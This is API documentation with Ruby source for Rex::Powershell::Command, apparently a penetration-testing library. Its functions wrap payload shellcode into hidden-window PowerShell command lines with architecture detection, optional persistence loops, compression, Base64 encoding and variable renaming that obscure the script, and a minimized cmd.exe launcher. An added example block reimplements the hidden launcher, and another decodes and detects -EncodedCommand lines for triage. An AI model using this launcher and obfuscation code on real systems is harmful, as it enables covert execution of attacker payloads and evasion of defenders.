Module: Rex::Powershell::Command

Defined in:
lib/rex/powershell/command.rb

Class Method Summary

  • .cmd_psh_payload(pay, payload_arch, template_path, opts = {}) ⇒ String
  • .compress_script(script_in, eof = nil, opts = {}) ⇒ String
  • .encode_script(script_in, eof = nil, opts = {}) ⇒ String
  • .generate_psh_args(opts) ⇒ String
  • .generate_psh_command_line(opts) ⇒ String
  • .run_hidden_psh(ps_code, payload_arch, encoded, opts = {}) ⇒ String

Class Method Details

.cmd_psh_payload(pay, payload_arch, template_path, opts = {}) ⇒ String

Creates a powershell command line string that executes the payload in a hidden window, using the powershell executable appropriate to the payload architecture. Opts are passed through to run_hidden_psh, generate_psh_command_line and generate_psh_args. The result is checked against the 8191-character cmd.exe command line limit and a RuntimeError is raised if it is longer.

Parameters:

  • pay (String)

    The payload shellcode

  • payload_arch (String)

    The payload architecture 'x86'/'x86_64'

  • template_path (String)

    Template path handed, together with the shellcode, to the Rex::Powershell::Payload method selected by :method

  • opts (Hash) (defaults to: {})

    The options to generate the command

Options Hash (opts):

  • :persist (Boolean)

    Loop the payload to cause re-execution if the shellcode finishes

  • :prepend_sleep (Integer)

    Sleep for the specified time before executing the payload

  • :method (String)

    The powershell injection technique to use: 'net'/'reflection'/'old'. 'msil' is rejected as no longer existing and any other value raises a RuntimeError

  • :encode_inner_payload (Boolean)

    Encodes the powershell script within the hidden/architecture detection wrapper. Incompatible with :encode_final_payload

  • :encode_final_payload (Boolean)

    Encodes the final powershell script and passes it with -EncodedCommand instead of -Command

  • :no_equals (Boolean)

    Pads the final script with spaces until its Base64 encoding contains no '=' character. Requires :encode_final_payload

  • :remove_comspec (Boolean)

    Omits the %COMSPEC% /b /c start /b /min launcher that is otherwise prepended to the command line

  • :use_single_quotes (Boolean)

    Wraps the -Command argument in single quotes, doubling any single quotes inside it; ignored when :encode_final_payload is set

Returns:

  • (String)

    Powershell command line with payload



# File 'lib/rex/powershell/command.rb', line 253

def self.cmd_psh_payload(pay, payload_arch, template_path, opts = {})
  if opts[:encode_inner_payload] && opts[:encode_final_payload]
    fail RuntimeError, ':encode_inner_payload and :encode_final_payload are incompatible options'
  end

  if opts[:no_equals] && !opts[:encode_final_payload]
    fail RuntimeError, ':no_equals requires :encode_final_payload option to be used'
  end

  psh_payload = case opts[:method]
                  when 'net'
                    Rex::Powershell::Payload.to_win32pe_psh_net(template_path, pay)
                  when 'reflection'
                    Rex::Powershell::Payload.to_win32pe_psh_reflection(template_path, pay)
                  when 'old'
                    Rex::Powershell::Payload.to_win32pe_psh(template_path, pay)
                  when 'msil'
                    fail RuntimeError, 'MSIL Powershell method no longer exists'
                  else
                    fail RuntimeError, 'No Powershell method specified'
                end

  # Run our payload in a while loop
  if opts[:persist]
    fun_name = Rex::Text.rand_text_alpha(rand(2) + 2)
    sleep_time = rand(5) + 5
    psh_payload  = "function #{fun_name}{#{psh_payload}};"
    psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
  end

  if opts[:prepend_sleep]
    if opts[:prepend_sleep].to_i > 0
      psh_payload = "Start-Sleep -s #{opts[:prepend_sleep]};" << psh_payload
    end
  end

  compressed_payload = compress_script(psh_payload, nil, opts)
  encoded_payload = encode_script(psh_payload, opts)

  # This branch is probably never taken...
  if encoded_payload.length <= compressed_payload.length
    smallest_payload = encoded_payload
    encoded = true
  else
    if opts[:encode_inner_payload]
      encoded = true
      compressed_encoded_payload = encode_script(compressed_payload)

      if encoded_payload.length <= compressed_encoded_payload.length
        smallest_payload = encoded_payload
      else
        smallest_payload = compressed_encoded_payload
      end
    else
      smallest_payload = compressed_payload
      encoded = false
    end
  end

  # Wrap in hidden runtime / architecture detection
  inner_args = opts.clone
  final_payload = run_hidden_psh(smallest_payload, payload_arch, encoded, inner_args)

  command_args = {
      noprofile: true,
      windowstyle: 'hidden'
  }.merge(opts)

  if opts[:encode_final_payload]
    command_args[:encodedcommand] = encode_script(final_payload)

    # If '=' is a bad character pad the payload until Base64 encoded
    # payload contains none.
    if opts[:no_equals]
      while command_args[:encodedcommand].include? '='
        final_payload << ' '
        command_args[:encodedcommand] = encode_script(final_payload)
      end
    end
  else
    if opts[:use_single_quotes]
      # Escape Single Quotes
      final_payload.gsub!("'", "''")
      # Wrap command in quotes
      final_payload = "'#{final_payload}'"
    end

    command_args[:command] = final_payload
  end

  psh_command = generate_psh_command_line(command_args)

  if opts[:remove_comspec]
    command = psh_command
  else
    command = "%COMSPEC% /b /c start /b /min #{psh_command}"
  end

  if command.length > 8191
    fail RuntimeError, 'Powershell command length is greater than the command line maximum (8192 characters)'
  end

  command
end

.compress_script(script_in, eof = nil, opts = {}) ⇒ String

Return a gzip-compressed powershell script. The enabled PSH modifiers (comment and whitespace stripping, variable and function name substitution) are applied before compression.

Parameters:

  • script_in (String)

    Script contents

  • eof (String) (defaults to: nil)

    Marker to indicate the end of file appended to script

  • opts (Hash) (defaults to: {})

    The options for encoding

Options Hash (opts):

  • :strip_comments (Bool)

    Strip comments

  • :strip_whitespace (Bool)

    Strip whitespace

  • :sub_vars (Bool)

    Substitute variable names

  • :sub_funcs (Bool)

    Substitute function names

Returns:

  • (String)

    Compressed script with decompression stub



# File 'lib/rex/powershell/command.rb', line 41

def self.compress_script(script_in, eof=nil, opts={})
  # Build script object
  psh = Rex::Powershell::Script.new(script_in)
  psh.strip_comments if opts[:strip_comments]
  psh.strip_whitespace if opts[:strip_whitespace]
  psh.sub_vars if opts[:sub_vars]
  psh.sub_funcs if opts[:sub_funcs]
  psh.compress_code(eof)
end

.encode_script(script_in, eof = nil, opts = {}) ⇒ String

Return an encoded powershell script. The enabled PSH modifiers (comment and whitespace stripping, variable and function name substitution) are applied before encoding.

Parameters:

  • script_in (String)

    Script contents

  • eof (String) (defaults to: nil)

    Marker to indicate the end of file appended to script

  • opts (Hash) (defaults to: {})

    The options for encoding

Options Hash (opts):

  • :strip_comments (Bool)

    Strip comments

  • :strip_whitespace (Bool)

    Strip whitespace

  • :sub_vars (Bool)

    Substitute variable names

  • :sub_funcs (Bool)

    Substitute function names

Returns:

  • (String)

    Encoded script



# File 'lib/rex/powershell/command.rb', line 18

def self.encode_script(script_in, eof=nil, opts={})
  # Build script object
  psh = Rex::Powershell::Script.new(script_in)
  psh.strip_comments if opts[:strip_comments]
  psh.strip_whitespace if opts[:strip_whitespace]
  psh.sub_vars if opts[:sub_vars]
  psh.sub_funcs if opts[:sub_funcs]
  psh.encode_code(eof)
end
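As an added example (this is not Rex's own encode_code, which lives in Rex::Powershell::Script and is not shown on this page), the following stand-alone Ruby produces the kind of value encode_script feeds to -EncodedCommand, implements the :no_equals padding loop from cmd_psh_payload, and does the reverse for a logged command line. It assumes the format powershell.exe documents for -EncodedCommand (the script text as UTF-16LE, Base64 encoded); the function names, the regular expression and the sample command lines are the example's own.

```ruby
require 'base64'

# Added example, not Rex's encode_code. powershell.exe documents
# -EncodedCommand as the script text in UTF-16LE, Base64 encoded.
def encode_command(script)
  Base64.strict_encode64(script.encode('UTF-16LE'))
end

# The reverse, as done when triaging a logged command line.
# Raises on malformed Base64 or on an odd byte count.
def decode_command(blob)
  Base64.strict_decode64(blob).force_encoding('UTF-16LE').encode('UTF-8')
end

# Same loop as :no_equals in cmd_psh_payload: append spaces until the Base64
# contains no '='. A space is two UTF-16LE bytes and Base64 pads only when
# the byte count is not a multiple of three, so the loop ends within two
# iterations. Returns [encoded_text, spaces_added].
def encode_without_equals(script)
  padded = script.dup
  padded << ' ' while encode_command(padded).include?('=')
  [encode_command(padded), padded.length - script.length]
end

# Locate the encoded script in a full command line. Covers the short form the
# page's shortener emits (-e), the other documented aliases (-ec,
# -EncodedCommand) and the common -enc, case-insensitively; powershell.exe
# accepts further abbreviations of the switch that this regex does not.
ENCODED_SWITCH = /(?:\A|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+\/]+=*)/i

# Returns the decoded script, or nil when the command line carries none.
def decode_from_command_line(command_line)
  m = ENCODED_SWITCH.match(command_line)
  m && decode_command(m[1])
end

if __FILE__ == $0
  # Constructed sample, shaped like the output of cmd_psh_payload with
  # :encode_final_payload and :no_equals set.
  enc, added = encode_without_equals('calc')
  line = "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e #{enc}"
  puts "#{added} space(s) added, '=' present: #{enc.include?('=')}"
  puts "decoded: #{decode_from_command_line(line).inspect}"
end
```

On the defensive side the same decoder is what turns a process-creation event carrying `-nop -w hidden -e ...` back into readable script, where the `[IntPtr]::Size` check and the ProcessStartInfo block from run_hidden_psh are plainly visible.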

.generate_psh_args(opts) ⇒ String

Generate arguments for the powershell command. The result has no leading space and its single trailing space is removed, e.g. "-Arg1 x -Arg -Arg x". The -Command argument, when present, is always placed last, because powershell treats everything after it as script text.

Parameters:

  • opts (Hash)

    The options to generate the command line

Options Hash (opts):

  • :shorten (Boolean)

    Whether to use the abbreviated switch names accepted by powershell v2.0 or greater; defaults to true unless :method is 'old'

  • :encodedcommand (String)

    Powershell script as an encoded command (-EncodedCommand)

  • :executionpolicy (String)

    The execution policy (-ExecutionPolicy)

  • :inputformat (String)

    The input format (-InputFormat)

  • :file (String)

    The path to a powershell file (-File)

  • :noexit (Boolean)

    Whether to keep the powershell process open after execution (-NoExit)

  • :nologo (Boolean)

    Whether to suppress the copyright banner at startup (-NoLogo)

  • :noninteractive (Boolean)

    Whether to load a non-interactive powershell (-NonInteractive)

  • :mta (Boolean)

    Whether to run as Multi-Threaded Apartment (-Mta)

  • :outputformat (String)

    The output format (-OutputFormat)

  • :sta (Boolean)

    Whether to run as Single-Threaded Apartment (-Sta)

  • :noprofile (Boolean)

    Whether to skip loading the current user's powershell profile (-NoProfile)

  • :windowstyle (String)

    The window style to use (-WindowStyle)

Returns:

  • (String)

    Powershell command arguments



# File 'lib/rex/powershell/command.rb', line 108

def self.generate_psh_args(opts)
  return '' unless opts

  unless opts.key? :shorten
    opts[:shorten] = (opts[:method] != 'old')
  end

  arg_string = ' '
  opts.each_pair do |arg, value|
    case arg
      when :encodedcommand
        arg_string << "-EncodedCommand #{value} " if value
      when :executionpolicy
        arg_string << "-ExecutionPolicy #{value} " if value
      when :inputformat
        arg_string << "-InputFormat #{value} " if value
      when :file
        arg_string << "-File #{value} " if value
      when :noexit
        arg_string << '-NoExit ' if value
      when :nologo
        arg_string << '-NoLogo ' if value
      when :noninteractive
        arg_string << '-NonInteractive ' if value
      when :mta
        arg_string << '-Mta ' if value
      when :outputformat
        arg_string << "-OutputFormat #{value} " if value
      when :sta
        arg_string << '-Sta ' if value
      when :noprofile
        arg_string << '-NoProfile ' if value
      when :windowstyle
        arg_string << "-WindowStyle #{value} " if  value
    end
  end

  # Command must be last (unless from stdin - etc)
  if opts[:command]
    arg_string << "-Command #{opts[:command]}"
  end

  # Shorten arg if PSH 2.0+
  if opts[:shorten]
    # Invoke-Command and Out-File require these options to have
    # an additional space before to prevent Powershell code being
    # mangled.
    arg_string.gsub!(' -Command ', ' -c ')
    arg_string.gsub!('-EncodedCommand ', '-e ')
    arg_string.gsub!('-ExecutionPolicy ', '-ep ')
    arg_string.gsub!(' -File ', ' -f ')
    arg_string.gsub!('-InputFormat ', '-i ')
    arg_string.gsub!('-NoExit ', '-noe ')
    arg_string.gsub!('-NoLogo ', '-nol ')
    arg_string.gsub!('-NoProfile ', '-nop ')
    arg_string.gsub!('-NonInteractive ', '-noni ')
    arg_string.gsub!('-OutputFormat ', '-o ')
    arg_string.gsub!('-Sta ', '-s ')
    arg_string.gsub!('-WindowStyle ', '-w ')
  end

  # Strip off first space character
  arg_string = arg_string[1..-1]
  # Remove final space character
  arg_string = arg_string[0..-2] if (arg_string[-1] == ' ')

  arg_string
end

.generate_psh_command_line(opts) ⇒ String

Generate a powershell command line, options are passed on to generate_psh_args

Parameters:

  • opts (Hash)

    The options to generate the command line

Options Hash (opts):

  • :path (String)

    Path to the powershell binary

  • :no_full_stop (Boolean)

    Whether to omit the .exe extension from the powershell binary name

Returns:

  • (String)

    Powershell command line with arguments



# File 'lib/rex/powershell/command.rb', line 61

def self.generate_psh_command_line(opts)
  if opts[:path] and (opts[:path][-1, 1] != '\\')
    opts[:path] << '\\'
  end

  if opts[:no_full_stop]
    binary = 'powershell'
  else
    binary = 'powershell.exe'
  end

  args = generate_psh_args(opts)

  "#{opts[:path]}#{binary} #{args}"
end

.run_hidden_psh(ps_code, payload_arch, encoded, opts = {}) ⇒ String

Wraps the powershell code so that it launches a hidden window, detects whether the host process is 32- or 64-bit, and spawns the powershell executable matching the payload architecture (the sysnative path from a 32-bit host for an x86_64 payload, the syswow64 path from a 64-bit host for an x86 payload). Single quotes in ps_code are doubled because the code is embedded in a single-quoted PowerShell string.

Parameters:

  • ps_code (String)

    Powershell code

  • payload_arch (String)

    The payload architecture 'x86'/'x86_64'

  • encoded (Boolean)

    Indicates whether ps_code is encoded or not

  • opts (Hash) (defaults to: {})

    The options for generate_psh_args

Returns:

  • (String)

    Wrapped powershell code



# File 'lib/rex/powershell/command.rb', line 188

def self.run_hidden_psh(ps_code, payload_arch, encoded, opts={})
  opts[:noprofile] ||= 'true'
  opts[:windowstyle] ||= 'hidden'

  # Old method needs host process to stay open
  opts[:noexit] = true if (opts[:method] == 'old')

  if encoded
    opts[:encodedcommand] = ps_code
  else
    opts[:command] = ps_code.gsub("'", "''")
  end

  ps_args = generate_psh_args(opts)

  process_start_info = <<EOS
$s=New-Object System.Diagnostics.ProcessStartInfo
$s.FileName=$b
$s.Arguments='#{ps_args}'
$s.UseShellExecute=$false
$s.RedirectStandardOutput=$true
$s.WindowStyle='Hidden'
$s.CreateNoWindow=$true
$p=[System.Diagnostics.Process]::Start($s)
EOS
  process_start_info.gsub!("\n", ';')

  architecture_detection = <<EOS
if([IntPtr]::Size -eq 4){
#{payload_arch == 'x86' ? "$b='powershell.exe'" : "$b=$env:windir+'\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe'"}
}else{
#{payload_arch == 'x86' ? "$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'" : "$b='powershell.exe'"}
};
EOS

  architecture_detection.gsub!("\n", '')

  architecture_detection + process_start_info
end
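The argument builder, command line builder, hidden wrapper and cmd.exe launcher from generate_psh_args, generate_psh_command_line, run_hidden_psh and the tail of cmd_psh_payload, as one added stand-alone example. This is not the Rex code and it does not call it; psh_args, psh_command_line, hidden_wrapper, cmd_wrapper and the constants are names chosen for the example. It exists to make three rules checkable in isolation: the shortener matches ' -Command ' and ' -File ' with a leading space so that Invoke-Command and Out-File inside the script survive, run_hidden_psh doubles single quotes because the inner arguments sit in a single-quoted PowerShell literal, and the finished command line must fit cmd.exe's 8191-character limit.

```ruby
# Added example, not the Rex code: the same rules as generate_psh_args,
# generate_psh_command_line, run_hidden_psh and the tail of cmd_psh_payload,
# reduced to stand-alone functions so each rule can be checked on its own.

FLAG_SWITCHES = {
  noexit: '-NoExit', nologo: '-NoLogo', noninteractive: '-NonInteractive',
  mta: '-Mta', sta: '-Sta', noprofile: '-NoProfile'
}.freeze

VALUE_SWITCHES = {
  encodedcommand: '-EncodedCommand', executionpolicy: '-ExecutionPolicy',
  inputformat: '-InputFormat', file: '-File', outputformat: '-OutputFormat',
  windowstyle: '-WindowStyle'
}.freeze

# Abbreviations accepted by powershell.exe 2.0+. -Command and -File are
# matched with a leading space because those substrings also occur inside
# cmdlet names (Invoke-Command, Out-File) that may sit in the script text.
SHORT_FORMS = {
  ' -Command ' => ' -c ', '-EncodedCommand ' => '-e ', '-ExecutionPolicy ' => '-ep ',
  ' -File ' => ' -f ', '-InputFormat ' => '-i ', '-NoExit ' => '-noe ',
  '-NoLogo ' => '-nol ', '-NoProfile ' => '-nop ', '-NonInteractive ' => '-noni ',
  '-OutputFormat ' => '-o ', '-Sta ' => '-s ', '-WindowStyle ' => '-w '
}.freeze

CMD_MAX = 8191 # longest command line cmd.exe accepts

def psh_args(opts)
  shorten = opts.fetch(:shorten) { opts[:method] != 'old' }
  arg_string = ' '.dup
  opts.each do |key, value|
    next unless value
    if FLAG_SWITCHES.key?(key)
      arg_string << "#{FLAG_SWITCHES[key]} "
    elsif VALUE_SWITCHES.key?(key)
      arg_string << "#{VALUE_SWITCHES[key]} #{value} "
    end
  end
  # powershell.exe treats everything after -Command as script text,
  # so it must be the last switch.
  arg_string << "-Command #{opts[:command]}" if opts[:command]
  SHORT_FORMS.each { |long, short| arg_string.gsub!(long, short) } if shorten
  arg_string[1..-1].chomp(' ')
end

def psh_command_line(opts)
  path = opts[:path].to_s.dup
  path << '\\' unless path.empty? || path.end_with?('\\')
  binary = opts[:no_full_stop] ? 'powershell' : 'powershell.exe'
  "#{path}#{binary} #{psh_args(opts)}"
end

def hidden_wrapper(ps_code, payload_arch, opts = {})
  opts = { noprofile: true, windowstyle: 'hidden' }.merge(opts)
  opts[:noexit] = true if opts[:method] == 'old' # 'old' needs the host to stay open
  # ps_code lands inside the single-quoted $s.Arguments literal below, so each
  # ' in it is doubled; otherwise it would terminate that literal early.
  opts[:command] = ps_code.gsub("'", "''")
  args = psh_args(opts)

  native    = "$b='powershell.exe'"
  sysnative = "$b=$env:windir+'\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe'"
  syswow64  = "$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'"
  # [IntPtr]::Size is 4 inside a 32-bit process. From there a 64-bit payload
  # needs the sysnative redirector; from a 64-bit process a 32-bit payload
  # needs the syswow64 copy. Otherwise the native powershell.exe is right.
  in32, in64 = payload_arch == 'x86' ? [native, syswow64] : [sysnative, native]

  [
    "if([IntPtr]::Size -eq 4){#{in32}}else{#{in64}}",
    '$s=New-Object System.Diagnostics.ProcessStartInfo',
    '$s.FileName=$b',
    "$s.Arguments='#{args}'",
    '$s.UseShellExecute=$false',
    '$s.RedirectStandardOutput=$true',
    "$s.WindowStyle='Hidden'",
    '$s.CreateNoWindow=$true',
    '$p=[System.Diagnostics.Process]::Start($s)'
  ].join(';') + ';'
end

def command_too_long?(command)
  command.length > CMD_MAX
end

# The cmd.exe launcher cmd_psh_payload prepends unless :remove_comspec is set.
def cmd_wrapper(psh_command, remove_comspec: false)
  command = remove_comspec ? psh_command : "%COMSPEC% /b /c start /b /min #{psh_command}"
  raise "#{command.length} characters exceeds the #{CMD_MAX}-character cmd.exe limit" if command_too_long?(command)
  command
end

if __FILE__ == $0
  wrapper = hidden_wrapper("Write-Host 'hi'", 'x86')
  puts cmd_wrapper(psh_command_line(noprofile: true, windowstyle: 'hidden', command: wrapper))
end
```

The outer command line and the inner $s.Arguments string are both built by the same function, which is why the page's shortener has to be careful about substrings: the inner arguments are already abbreviated by the time they are embedded, and a second pass over the outer string must not rewrite anything inside them or inside the script.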